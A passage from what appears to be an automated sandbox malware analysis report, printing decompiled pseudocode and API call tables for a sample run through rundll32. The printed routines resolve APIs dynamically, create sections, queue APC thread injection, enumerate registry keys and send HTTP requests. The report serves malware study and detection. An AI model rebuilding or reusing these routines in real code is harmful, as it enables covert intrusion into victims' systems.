							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x343a348; // 0x21ad5a8
								_t9 = _t36 + 0x343b4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x343a348; // 0x21ad5a8
									_t11 = _t39 + 0x343b786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0343190C(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                0x034344ed
                                0x034344f1
                                0x034345b3
                                0x034344f7
                                0x034344f7
                                0x034344fc
                                0x0343450f
                                0x03434511
                                0x03434516
                                0x0343451e
                                0x03434525
                                0x03434527
                                0x0343452c
                                0x034345ab
                                0x034345ac
                                0x0343452e
                                0x0343452e
                                0x03434533
                                0x0343453b
                                0x0343453d
                                0x03434542
                                0x00000000
                                0x03434544
                                0x03434544
                                0x03434549
                                0x03434551
                                0x03434553
                                0x03434558
                                0x00000000
                                0x0343455a
                                0x0343455a
                                0x0343455f
                                0x03434567
                                0x03434569
                                0x0343456e
                                0x00000000
                                0x03434570
                                0x03434570
                                0x03434575
                                0x0343457d
                                0x0343457f
                                0x03434584
                                0x00000000
                                0x03434586
                                0x0343458c
                                0x03434591
                                0x03434598
                                0x0343459d
                                0x034345a2
                                0x00000000
                                0x034345a4
                                0x034345a7
                                0x034345a7
                                0x034345a2
                                0x03434584
                                0x0343456e
                                0x03434558
                                0x03434542
                                0x0343452c
                                0x034345c1

                                APIs
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,03434046,?,?,?,?,00000000,00000000), ref: 03434503
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 03434525
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0343453B
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03434551
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03434567
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0343457D
                                  • Part of subcall function 0343190C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,0343459D), ref: 03431969
                                  • Part of subcall function 0343190C: memset.NTDLL ref: 0343198B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                • String ID:
                                • API String ID: 3012371009-0
                                • Opcode ID: d2abda943b6a0d6a9ca6f36a6e38f12e53705effd62304101bcc02f14b459bd3
                                • Instruction ID: 304853717cd3fd98f48ef20ea339543a0040e8b7e61c8c396f9bb4ba78090d08
                                • Opcode Fuzzy Hash: d2abda943b6a0d6a9ca6f36a6e38f12e53705effd62304101bcc02f14b459bd3
                                • Instruction Fuzzy Hash: 2E217CB091070AAFD751EF6AC884F9BB7FCEF592107054026EA45DF310DB70E9058BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03436954 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03436954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0) {
					_t9 = E034345C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
					if(_t9 == 0) {
						L9:
						return GetLastError();
					}
				}
				_t10 = E03437AF1(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                0x03436954
                                0x03436961
                                0x03436963
                                0x0343696e
                                0x03436975
                                0x034369c6
                                0x00000000
                                0x034369c6
                                0x03436975
                                0x0343697b
                                0x03436982
                                0x0343698e
                                0x03436993
                                0x034369a9
                                0x034369b9
                                0x00000000
                                0x034369ab
                                0x034369ab
                                0x034369b2
                                0x034369bf
                                0x034369bf
                                0x034369bf
                                0x034369b2
                                0x034369a9
                                0x034369c4
                                0x00000000
                                0x00000000
                                0x034369ca

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,034337A0,?,?,76CC81D0,00000000), ref: 0343698E
                                • ResetEvent.KERNEL32(?), ref: 03436993
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 034369A0
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?,?), ref: 034369AB
                                • GetLastError.KERNEL32(?,?,00000102,034337A0,?,?,76CC81D0,00000000), ref: 034369C6
                                  • Part of subcall function 034345C4: lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,03436973,?,?,?,?,00000102,034337A0,?,?,76CC81D0), ref: 034345D0
                                  • Part of subcall function 034345C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03436973,?,?,?,?,00000102,034337A0,?), ref: 0343462E
                                  • Part of subcall function 034345C4: lstrcpy.KERNEL32(00000000,00000000), ref: 0343463E
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?), ref: 034369B9
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: 21d18b1b3beff0c7f6184ed98340525bf758cf563f0ad4814796a5316f557884
                                • Instruction ID: 6ad5b486139885b129e6cf739247b0758cd5d196c3870c9f76b2f83881da01ba
                                • Opcode Fuzzy Hash: 21d18b1b3beff0c7f6184ed98340525bf758cf563f0ad4814796a5316f557884
                                • Instruction Fuzzy Hash: 1801A271104202BADB30AA71DD84F5BFAF8EF4A360F150626F551EB1E0C764D414DE18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034873AA Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,00000000,0348893A,0349A174,03490998), ref: 034873C1
                                • QueueUserAPC.KERNEL32(0348893A,00000000,?,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873D6
                                • GetLastError.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873E1
                                • TerminateThread.KERNEL32(00000000,00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873EB
                                • CloseHandle.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873F2
                                • SetLastError.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873FB
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                • String ID:
                                • API String ID: 3832013932-0
                                • Opcode ID: 8748b135db34dd0ac4cbffae2df6e0812526af85c16ab48a9d9720a51537f762
                                • Instruction ID: 514a435424df011ac88a4d1eb8914eb0ed1080a6a79a18e395224e09213389fc
                                • Opcode Fuzzy Hash: 8748b135db34dd0ac4cbffae2df6e0812526af85c16ab48a9d9720a51537f762
                                • Instruction Fuzzy Hash: 83F08C32605220BBD7237FA0AC0AF5FBFA8FF2AB51F258446F601B8158C72188118B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03433472 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E03433472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x343a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E034361FC( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E03436F28(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E03436C2C(_a8);
						goto L29;
					}
					_t64 =  *0x343a318; // 0x55e9d70
					_t16 = _t64 + 0xc; // 0x55e9e92
					_t65 = E034361FC(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d034390, executed
						_t67 = E03434822(_t97,  *_t33, _t91, _a8,  *0x343a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x343a348; // 0x21ad5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x343ba4c; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x343ba47; // 0x55434b48
								_t69 = _t34;
							}
							_t70 = E034362F6(_t69,  *0x343a3d4,  *0x343a3d8,  &_a24,  &_a16); // executed
							if(_t70 == 0) {
								if(_t98 == 0) {
									_t71 =  *0x343a348; // 0x21ad5a8
									_t44 = _t71 + 0x343b842; // 0x74666f53
									_t73 = E034361FC(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d034390
										E034374B6( *_t47, _t91, _a8,  *0x343a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d034390
										E034374B6( *_t49, _t91, _t99,  *0x343a3d0, _a16);
										E03436C2C(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d034390, executed
									E034374B6( *_t40, _t91, _a8,  *0x343a3d8, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d034390
									E034374B6( *_t43, _t91, _a8,  *0x343a3d0, _a16);
								}
								if( *_t101 != 0) {
									E03436C2C(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d034390, executed
					_t81 = E034312CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d034390
							E03434822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E03436C2C(_t100);
						_t98 = _a16;
					}
					E03436C2C(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E03437A1E(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x343a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}


























                                0x03433472
                                0x0343347b
                                0x03433482
                                0x03433487
                                0x034334f4
                                0x034334fa
                                0x034334ff
                                0x03433506
                                0x0343350b
                                0x03433510
                                0x0343367b
                                0x03433682
                                0x03433682
                                0x03433687
                                0x03433689
                                0x03433689
                                0x03433692
                                0x03433692
                                0x03433516
                                0x0343351b
                                0x03433522
                                0x03433671
                                0x03433674
                                0x00000000
                                0x03433674
                                0x03433528
                                0x0343352d
                                0x03433530
                                0x03433535
                                0x0343353a
                                0x03433583
                                0x03433583
                                0x03433596
                                0x03433599
                                0x034335a0
                                0x034335a6
                                0x034335ad
                                0x034335b7
                                0x034335b7
                                0x034335af
                                0x034335af
                                0x034335af
                                0x034335af
                                0x034335d2
                                0x034335d9
                                0x034335e1
                                0x0343360f
                                0x03433614
                                0x0343361b
                                0x03433620
                                0x03433624
                                0x03433656
                                0x03433626
                                0x03433633
                                0x03433636
                                0x03433646
                                0x03433649
                                0x0343364f
                                0x0343364f
                                0x034335e3
                                0x034335f0
                                0x034335f3
                                0x03433605
                                0x03433608
                                0x03433608
                                0x03433660
                                0x0343366c
                                0x03433662
                                0x03433665
                                0x03433665
                                0x03433660
                                0x034335d9
                                0x00000000
                                0x034335a0
                                0x03433549
                                0x0343354c
                                0x03433553
                                0x03433559
                                0x0343355c
                                0x0343355e
                                0x0343356a
                                0x0343356d
                                0x0343356d
                                0x03433573
                                0x03433578
                                0x03433578
                                0x0343357e
                                0x00000000
                                0x0343357e
                                0x0343348c
                                0x00000000
                                0x034334b3
                                0x034334b3
                                0x034334bf
                                0x034334d2
                                0x034334d8
                                0x034334e0
                                0x00000000
                                0x034334e0

                                APIs
                                • StrChrA.SHLWAPI(03437168,0000005F,00000000,00000000,00000104), ref: 034334A5
                                • lstrcpy.KERNEL32(?,?), ref: 034334D2
                                  • Part of subcall function 034361FC: lstrlen.KERNEL32(?,00000000,055E9D70,00000000,034339E8,055E9F93,69B25F44,?,?,?,?,69B25F44,00000005,0343A00C,4D283A53,?), ref: 03436203
                                  • Part of subcall function 034361FC: mbstowcs.NTDLL ref: 0343622C
                                  • Part of subcall function 034361FC: memset.NTDLL ref: 0343623E
                                  • Part of subcall function 034374B6: lstrlenW.KERNEL32(?,?,?,0343363B,3D034390,80000002,03437168,03437283,74666F53,4D4C4B48,03437283,?,3D034390,80000002,03437168,?), ref: 034374DB
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                • lstrcpy.KERNEL32(?,00000000), ref: 034334F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 506d4d5521ba34d82a33cd73555482f6d41c648e4c2ecca27aa0b2e20b05d4a8
                                • Instruction ID: dd74624cdec3ca089dbfc5831122a9640ff76419b4a2433f3153df7354dff1ce
                                • Opcode Fuzzy Hash: 506d4d5521ba34d82a33cd73555482f6d41c648e4c2ecca27aa0b2e20b05d4a8
                                • Instruction Fuzzy Hash: 82516A7910020AEFCF61EF60DC40E9A7BB9EF0A340F04851AF955AF260D735D925AB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034371B6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98registrysynchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E034371B6(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E03436D63(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E03436C2C(_v28);
							goto L17;
						}
						_t42 = E03433472(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E03436C2C(_v24);
						_v20 = _v16;
						_t47 = E03436D63(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x343a30c, 0) == 0x102);
				goto L16;
			}

















                                0x034371b6
                                0x034371d0
                                0x034371d3
                                0x034371d6
                                0x034371d9
                                0x034371dc
                                0x034371e2
                                0x034371e6
                                0x034372c0
                                0x034372c4
                                0x034372c4
                                0x034371ef
                                0x034371f6
                                0x034371fb
                                0x03437200
                                0x034372b5
                                0x034372b8
                                0x00000000
                                0x034372be
                                0x03437206
                                0x03437209
                                0x03437210
                                0x0343721a
                                0x03437223
                                0x03437229
                                0x03437231
                                0x03437269
                                0x034372a3
                                0x034372a9
                                0x034372ab
                                0x034372ab
                                0x034372ad
                                0x034372b0
                                0x00000000
                                0x034372b0
                                0x0343727e
                                0x03437283
                                0x03437287
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03437287
                                0x03437236
                                0x03437245
                                0x00000000
                                0x00000000
                                0x0343724a
                                0x03437253
                                0x03437256
                                0x0343725b
                                0x03437260
                                0x0343723b
                                0x0343723b
                                0x00000000
                                0x0343723b
                                0x03437264
                                0x00000000
                                0x03437264
                                0x03437238
                                0x00000000
                                0x03437289
                                0x03437296
                                0x00000000

                                APIs
                                • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,03437168,?), ref: 034371DC
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • RegEnumKeyExA.KERNEL32(?,?,?,03437168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,03437168), ref: 03437223
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,03437168,?,03437168,?,?,?,?,?,03437168,?), ref: 03437290
                                • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,03437168,?), ref: 034372B8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                • String ID: !s
                                • API String ID: 3664505660-1801701826
                                • Opcode ID: e4cf54ac31be95582d2245b876f14f8e25215c00c9dbd0f795b965840bfb7d46
                                • Instruction ID: b4a45f5765cee1824c061407f797cc72d47feaf691dd0ac87a74edc949541b6e
                                • Opcode Fuzzy Hash: e4cf54ac31be95582d2245b876f14f8e25215c00c9dbd0f795b965840bfb7d46
                                • Instruction Fuzzy Hash: 10315AB5C04219AFCF21EFA5D8849EFFEB9EB4A710F144067F991BB210D6750A408B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03433D2C Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E03433D2C(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E03433CFD();
				if(_t21 != 0) {
					_t59 =  *0x343a2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x343a2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x343a178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E0343389E( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x343a348; // 0x21ad5a8
					if( *0x343a2fc > 5) {
						_t8 = _t26 + 0x343b5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x343b9fd; // 0x44283a44
						_t27 = _t7;
					}
					E03436B80(_t27, _t27);
					_t31 = E034376BB(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x343a310 =  *0x343a310 ^ 0x81bbe65d;
						_t32 = E03436D63(0x60);
						 *0x343a3cc = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x343a3cc; // 0x55e95b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x343a3cc; // 0x55e95b0
							 *_t51 = 0x343b827;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x343a2d8, 0, 0x43);
							 *0x343a368 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x343a2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x343a348; // 0x21ad5a8
								_t13 = _t58 + 0x343b552; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x3439287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E03433365( ~_v8 &  *0x343a310, 0x343a00c); // executed
								_t42 = E03431645(0, _t55, _t63, 0x343a00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E03433981(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E0343661D(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E0343529C(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x343a17c(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E03437928(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                0x03433d2c
                                0x03433d36
                                0x03433d39
                                0x03433d3c
                                0x03433d3f
                                0x03433d46
                                0x03433d48
                                0x03433d54
                                0x03433d56
                                0x03433d56
                                0x03433d5f
                                0x03433d65
                                0x03433d6a
                                0x03433d84
                                0x03433d90
                                0x03433d92
                                0x03433d97
                                0x03433da1
                                0x03433da1
                                0x03433d99
                                0x03433d99
                                0x03433d99
                                0x03433d99
                                0x03433da8
                                0x03433db5
                                0x03433dbc
                                0x03433dc1
                                0x03433dc1
                                0x03433dca
                                0x03433dcd
                                0x03433df3
                                0x03433dff
                                0x03433e04
                                0x03433e09
                                0x03433e0b
                                0x03433e37
                                0x03433e39
                                0x03433e0d
                                0x03433e11
                                0x03433e16
                                0x03433e1b
                                0x03433e22
                                0x03433e28
                                0x03433e2d
                                0x03433e33
                                0x03433e3a
                                0x03433e3c
                                0x03433e3e
                                0x03433e4d
                                0x03433e53
                                0x03433e58
                                0x03433e5a
                                0x03433e8a
                                0x03433e8c
                                0x03433e5c
                                0x03433e5c
                                0x03433e62
                                0x03433e6f
                                0x03433e75
                                0x03433e75
                                0x03433e7d
                                0x03433e86
                                0x03433e8d
                                0x03433e8f
                                0x03433e91
                                0x03433e98
                                0x03433ea5
                                0x03433eaa
                                0x03433eaf
                                0x03433eb1
                                0x03433eb3
                                0x00000000
                                0x00000000
                                0x03433eb5
                                0x03433eba
                                0x03433ebc
                                0x03433ec3
                                0x03433ec7
                                0x03433eca
                                0x03433edf
                                0x03433ee3
                                0x03433ee8
                                0x00000000
                                0x03433ee8
                                0x03433ecc
                                0x03433ece
                                0x00000000
                                0x00000000
                                0x03433ed9
                                0x03433edb
                                0x03433edd
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03433edd
                                0x03433ec0
                                0x03433ec0
                                0x03433e91
                                0x03433dcf
                                0x03433dcf
                                0x03433dd4
                                0x03433eea
                                0x03433eef
                                0x03433ef7
                                0x03433ef7
                                0x00000000
                                0x03433eef
                                0x03433dda
                                0x03433ddd
                                0x03433de7
                                0x03433dee
                                0x00000000
                                0x03433eff
                                0x03433eff
                                0x03433f02
                                0x03433f06
                                0x03433f06

                                APIs
                                  • Part of subcall function 03433CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,03433D44,00000001), ref: 03433D0C
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 03433DC1
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • memset.NTDLL ref: 03433E11
                                • RtlInitializeCriticalSection.NTDLL(055E9570), ref: 03433E22
                                  • Part of subcall function 0343529C: memset.NTDLL ref: 034352B6
                                  • Part of subcall function 0343529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 034352FC
                                  • Part of subcall function 0343529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 03435307
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 03433E4D
                                • wsprintfA.USER32 ref: 03433E7D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
